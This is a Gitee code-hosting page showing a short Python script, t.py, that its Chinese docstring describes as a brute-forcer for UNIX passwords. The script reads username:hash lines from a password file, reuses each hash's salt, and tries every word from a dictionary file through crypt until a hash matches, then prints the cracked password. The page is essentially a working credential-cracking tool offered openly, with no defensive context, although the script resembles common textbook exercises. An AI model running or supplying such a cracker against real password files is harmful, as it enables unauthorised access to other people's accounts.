加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
t.py 723 Bytes
一键复制 编辑 原始数据 按行查看 历史
D60 提交于 2016-12-05 18:07 . add source code
# coding=UTF-8
'''
暴力破解UNIX的密码,需要输入字典文件和UNIX的密码文件
'''
import crypt
def testPass(cryptPass):
salt = cryptPass[0:2]
dictfile = open('dictionary.txt', 'r')
for word in dictfile.readlines():
word = word.strip('\n')
cryptWord = crypt.crypt(word, salt)
if cryptPass == cryptWord:
print('Found passed:', word)
return
print('Password not found!')
def main():
passfile = open('passwords.txt','r')
for line in passfile.readlines():
user = line.split(':')[0]
cryptPass = line.split(':')[1]
print("Cracking Password For:", user)
testPass(cryptPass)
if __name__ == '__main__':
main()
Loading...
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化